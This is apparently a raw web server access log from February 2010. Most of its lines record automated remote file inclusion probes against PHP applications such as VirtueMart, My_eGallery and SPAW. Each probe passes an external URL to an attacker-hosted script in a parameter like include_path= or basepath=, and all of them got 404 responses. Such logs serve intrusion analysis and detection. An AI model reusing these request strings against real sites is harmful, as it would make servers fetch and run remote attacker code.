60.251.165.181 - - [06/Feb/2010:02:18:41 -0600] "GET /index.php?nic=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
60.251.165.181 - - [06/Feb/2010:02:20:35 -0600] "GET /logs/access_log.1250553600/index.php?nic=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
60.251.165.181 - - [06/Feb/2010:02:20:35 -0600] "GET /logs/access_log.1261267200/index.php?nic=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
60.251.165.181 - - [06/Feb/2010:02:20:35 -0600] "GET /logs/index.php?nic=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:23:55 -0600] "GET /logs//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:23:55 -0600] "GET //admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:23:55 -0600] "GET /logs/access_log.1252368000//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:23:55 -0600] "GET /logs/access_log.1252886400//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:24:11 -0600] "GET //admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:24:11 -0600] "GET /logs//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:24:12 -0600] "GET /logs/access_log.1252368000//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:24:12 -0600] "GET /logs/access_log.1260316800//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.46.199.200 - - [06/Feb/2010:02:24:25 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [06/Feb/2010:02:26:05 -0600] "GET /logs//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [06/Feb/2010:02:26:05 -0600] "GET /logs/access_log.1253404800//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.88.4.141 - - [06/Feb/2010:02:26:05 -0600] "GET //admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.220.144.69 - - [06/Feb/2010:02:26:11 -0600] "GET /logs/.php?id= HTTP/1.1" 404 292 "-""-"
83.220.144.69 - - [06/Feb/2010:02:26:12 -0600] "GET /.php?id= HTTP/1.1" 404 287 "-""-"
121.88.4.141 - - [06/Feb/2010:02:26:29 -0600] "GET /logs/access_log.1250726400//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.207.122 - - [06/Feb/2010:02:26:59 -0600] "GET /logs/access_log.1233187200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.239.121.204 - - [06/Feb/2010:02:27:19 -0600] "GET /logs/index1.php?dat=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:19 -0600] "GET /logs/access_log.1253232000/index1.php?dat=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:19 -0600] "GET /logs/access_log.1260403200/index1.php?dat=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:19 -0600] "GET /index1.php?dat=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.55.207.134 - - [06/Feb/2010:02:27:30 -0600] "GET /logs/access_log.1179532800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.239.121.204 - - [06/Feb/2010:02:27:35 -0600] "GET /index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:35 -0600] "GET /logs/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:35 -0600] "GET /logs/access_log.1260057600/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:35 -0600] "GET /logs/access_log.1257984000/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:57 -0600] "GET /index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:57 -0600] "GET /logs/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:27:57 -0600] "GET /logs/access_log.1260057600/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:28:24 -0600] "GET /logs/access_log.1257984000/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:28:55 -0600] "GET /index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:28:55 -0600] "GET /logs/access_log.1253232000/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:28:55 -0600] "GET /logs/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:28:58 -0600] "GET //admin/config_settings.tpl.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:28:58 -0600] "GET /logs//admin/config_settings.tpl.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:28:59 -0600] "GET /logs/access_log.1252368000//admin/config_settings.tpl.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:01 -0600] "GET //admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:02 -0600] "GET /logs//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:03 -0600] "GET /logs/access_log.1252886400//admin/config_settings.tpl.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:03 -0600] "GET /logs/access_log.1252368000//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:04 -0600] "GET /logs/access_log.1252886400//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.103.128.44 - - [06/Feb/2010:02:29:22 -0600] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.103.128.44 - - [06/Feb/2010:02:29:22 -0600] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.103.128.44 - - [06/Feb/2010:02:29:22 -0600] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:29:24 -0600] "GET /logs/access_log.1253664000/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.150.147.153 - - [06/Feb/2010:02:29:29 -0600] "GET //bbs//skin/zina02_purple/setup.php?dir=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
212.150.147.153 - - [06/Feb/2010:02:29:29 -0600] "GET /logs/access_log.1250294400//bbs//skin/zina02_purple/setup.php?dir=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
212.150.147.153 - - [06/Feb/2010:02:29:29 -0600] "GET /logs//bbs//skin/zina02_purple/setup.php?dir=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:47 -0600] "GET //admin/config_settings.tpl.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:47 -0600] "GET /logs//admin/config_settings.tpl.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:50 -0600] "GET /logs/access_log.1252368000//admin/config_settings.tpl.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.103.128.44 - - [06/Feb/2010:02:29:50 -0600] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:52 -0600] "GET /logs/access_log.1260316800//admin/config_settings.tpl.php?include_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:52 -0600] "GET //admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:53 -0600] "GET /logs/access_log.1252368000//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:53 -0600] "GET /logs//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
195.190.166.35 - - [06/Feb/2010:02:29:55 -0600] "GET /logs/access_log.1260316800//admin/config_settings.tpl.php?include_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.150.147.153 - - [06/Feb/2010:02:31:58 -0600] "GET //bbs//skin/zina02_purple/setup.php?dir=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
212.150.147.153 - - [06/Feb/2010:02:31:58 -0600] "GET /logs//bbs//skin/zina02_purple/setup.php?dir=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
212.150.147.153 - - [06/Feb/2010:02:31:58 -0600] "GET /logs/access_log.1250294400//bbs//skin/zina02_purple/setup.php?dir=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:32:00 -0600] "GET /index1.php?dat=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:32:00 -0600] "GET /logs/index1.php?dat=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:32:00 -0600] "GET /logs/access_log.1260403200/index1.php?dat=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:32:00 -0600] "GET /logs/access_log.1253232000/index1.php?dat=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:32:48 -0600] "GET /logs/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:32:48 -0600] "GET /logs/access_log.1257984000/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:32:48 -0600] "GET /index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:32:48 -0600] "GET /logs/access_log.1260057600/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:01 -0600] "GET /index2.php?showpage=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:01 -0600] "GET /logs/access_log.1254528000/index2.php?showpage=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:01 -0600] "GET /logs/index2.php?showpage=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:01 -0600] "GET /logs/access_log.1255737600/index2.php?showpage=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:03 -0600] "GET /logs/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:03 -0600] "GET /logs/access_log.1260057600/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:03 -0600] "GET /index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:03 -0600] "GET /logs/access_log.1257984000/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.150.147.153 - - [06/Feb/2010:02:33:07 -0600] "GET /logs/access_log.1259020800//bbs//skin/zina02_purple/setup.php?dir=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:21 -0600] "GET /index2.php?showpage=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:21 -0600] "GET /logs/access_log.1254528000/index2.php?showpage=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:21 -0600] "GET /logs/index2.php?showpage=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:33:21 -0600] "GET /logs/access_log.1255737600/index2.php?showpage=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.150.147.153 - - [06/Feb/2010:02:33:52 -0600] "GET /logs/access_log.1259020800//bbs//skin/zina02_purple/setup.php?dir=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:25 -0600] "GET /logs/access_log.1260057600/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:25 -0600] "GET /index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:25 -0600] "GET /logs/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:25 -0600] "GET /logs/access_log.1257984000/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.195.37.107 - - [06/Feb/2010:02:34:35 -0600] "GET /logs/access_log.1238371200 HTTP/1.0" 200 286413 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.239.121.204 - - [06/Feb/2010:02:34:42 -0600] "GET /logs/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:42 -0600] "GET /index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.88.4.141 - - [06/Feb/2010:02:34:44 -0600] "GET /logs//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [06/Feb/2010:02:34:44 -0600] "GET //admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.88.4.141 - - [06/Feb/2010:02:34:44 -0600] "GET /logs/access_log.1253404800//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:48 -0600] "GET /index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:48 -0600] "GET /logs/access_log.1260057600/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:48 -0600] "GET /logs/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:34:48 -0600] "GET /logs/access_log.1257984000/index2.php?ascii_seite=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:34:48 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:34:49 -0600] "GET /logs/access_log.1230681600/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:34:52 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:10 -0600] "GET /logs/access_log.1260144000/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:13 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:13 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:15 -0600] "GET /logs/access_log.1230681600/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:35:16 -0600] "GET /logs/access_log.1253232000/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:35:16 -0600] "GET /logs/access_log.1253664000/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:16 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:16 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:16 -0600] "GET /logs/access_log.1230681600/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:32 -0600] "GET /logs/access_log.1260144000/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:35:33 -0600] "GET /logs/access_log.1260144000/modules/My_eGallery/index.php?basepath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:35:58 -0600] "GET /logs/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:35:58 -0600] "GET /index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.88.4.141 - - [06/Feb/2010:02:36:01 -0600] "GET /logs/access_log.1250726400//admin.lurm_constructor.php?lm_absolute_path=http://tian2010.fileave.com/idxx.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:36:10 -0600] "GET /index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:36:10 -0600] "GET /logs/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:36:35 -0600] "GET /logs/access_log.1253232000/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:36:35 -0600] "GET /logs/access_log.1253664000/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:36:47 -0600] "GET /logs/access_log.1253232000/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:36:47 -0600] "GET /logs/access_log.1253664000/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.107.179 - - [06/Feb/2010:02:37:00 -0600] "GET /logs/access_log.1109894400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.239.121.204 - - [06/Feb/2010:02:37:10 -0600] "GET /logs/index2.php?url_page=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:10 -0600] "GET /logs/access_log.1257465600/index2.php?url_page=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:10 -0600] "GET /index2.php?url_page=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:10 -0600] "GET /index2.php?url_page=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:10 -0600] "GET /logs/index2.php?url_page=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:10 -0600] "GET /logs/access_log.1257465600/index2.php?url_page=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:19 -0600] "GET /logs/access_log.1257120000/index2.php?url_page=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:34 -0600] "GET /logs/access_log.1257120000/index2.php?url_page=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.237.78.176 - - [06/Feb/2010:02:37:45 -0600] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.237.78.176 - - [06/Feb/2010:02:37:45 -0600] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.237.78.176 - - [06/Feb/2010:02:37:45 -0600] "GET /logs/access_log.1237334400/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:59 -0600] "GET /index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.239.121.204 - - [06/Feb/2010:02:37:59 -0600] "GET /logs/index2.php?DoAction=http://www.bokji.or.kr/id/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:38:04 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:38:04 -0600] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
219.94.193.152 - - [06/Feb/2010:02:38:04 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.237.78.176 - - [06/Feb/2010:02:38:15 -0600] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
